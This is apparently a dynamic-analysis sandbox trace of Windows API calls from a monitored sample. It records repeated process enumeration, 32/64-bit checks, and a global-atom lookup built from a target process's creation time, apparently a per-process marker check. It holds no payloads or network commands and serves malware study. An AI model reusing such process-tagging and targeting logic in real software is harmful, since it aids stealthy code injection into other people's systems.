	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.799] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.799] CloseHandle (hObject=0x20c) returned 1
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.799] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.799] CloseHandle (hObject=0x20c) returned 1
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.799] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.799] CloseHandle (hObject=0x20c) returned 1
	[0091.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.799] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.799] CloseHandle (hObject=0x20c) returned 1
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.800] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.800] CloseHandle (hObject=0x20c) returned 1
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.800] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.800] CloseHandle (hObject=0x20c) returned 1
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.800] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.800] CloseHandle (hObject=0x20c) returned 1
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.800] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.800] CloseHandle (hObject=0x20c) returned 1
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.800] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.800] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.801] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.801] CloseHandle (hObject=0x20c) returned 1
	[0091.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.802] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.802] CloseHandle (hObject=0x20c) returned 1
	[0091.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.802] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.802] CloseHandle (hObject=0x20c) returned 1
	[0091.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.802] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.802] CloseHandle (hObject=0x20c) returned 1
	[0091.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.802] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.802] CloseHandle (hObject=0x20c) returned 1
	[0091.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.802] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.803] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.803] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.803] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.803] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.803] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.803] CloseHandle (hObject=0x20c) returned 1
	[0091.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.804] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.804] CloseHandle (hObject=0x20c) returned 1
	[0091.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.804] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.804] CloseHandle (hObject=0x20c) returned 1
	[0091.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.804] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.804] CloseHandle (hObject=0x20c) returned 1
	[0091.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.804] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.804] CloseHandle (hObject=0x20c) returned 1
	[0091.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.804] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.804] CloseHandle (hObject=0x20c) returned 1
	[0091.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.805] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.805] CloseHandle (hObject=0x20c) returned 1
	[0091.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.805] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.805] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.805] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.805] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.806] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.806] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.806] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.806] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.806] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.806] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.807] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.807] CloseHandle (hObject=0x20c) returned 1
	[0091.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.807] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.807] CloseHandle (hObject=0x20c) returned 1
	[0091.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.887] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.887] CloseHandle (hObject=0x20c) returned 1
	[0091.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.887] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.887] CloseHandle (hObject=0x20c) returned 1
	[0091.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.887] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.887] CloseHandle (hObject=0x20c) returned 1
	[0091.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.888] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.888] CloseHandle (hObject=0x20c) returned 1
	[0091.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.888] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.888] CloseHandle (hObject=0x20c) returned 1
	[0091.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.888] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.888] CloseHandle (hObject=0x20c) returned 1
	[0091.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.888] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.888] CloseHandle (hObject=0x20c) returned 1
	[0091.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.888] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.888] CloseHandle (hObject=0x20c) returned 1
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.889] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.889] CloseHandle (hObject=0x20c) returned 1
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.889] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.889] CloseHandle (hObject=0x20c) returned 1
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.889] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.889] CloseHandle (hObject=0x20c) returned 1
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.889] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.889] CloseHandle (hObject=0x20c) returned 1
	[0091.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.889] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.889] CloseHandle (hObject=0x20c) returned 1
	[0091.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.890] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.890] CloseHandle (hObject=0x20c) returned 1
	[0091.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.890] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.890] CloseHandle (hObject=0x20c) returned 1
	[0091.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.890] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.890] CloseHandle (hObject=0x20c) returned 1
	[0091.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.890] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.890] CloseHandle (hObject=0x20c) returned 1
	[0091.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.890] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.891] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.891] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.891] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.891] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.891] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.891] CloseHandle (hObject=0x20c) returned 1
	[0091.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.892] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.892] CloseHandle (hObject=0x20c) returned 1
	[0091.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.892] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.892] CloseHandle (hObject=0x20c) returned 1
	[0091.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.892] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.892] CloseHandle (hObject=0x20c) returned 1
	[0091.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.892] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.892] CloseHandle (hObject=0x20c) returned 1
	[0091.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.892] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.892] CloseHandle (hObject=0x20c) returned 1
	[0091.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.893] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.893] CloseHandle (hObject=0x20c) returned 1
	[0091.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.893] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.893] CloseHandle (hObject=0x20c) returned 1
	[0091.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.893] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.893] CloseHandle (hObject=0x20c) returned 1
	[0091.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.893] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.894] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.894] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.894] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.894] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.894] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.894] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.894] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.894] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.894] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.895] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.895] CloseHandle (hObject=0x20c) returned 1
	[0091.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.895] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.895] CloseHandle (hObject=0x20c) returned 1
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.967] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.967] CloseHandle (hObject=0x20c) returned 1
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.967] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.967] CloseHandle (hObject=0x20c) returned 1
	[0091.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
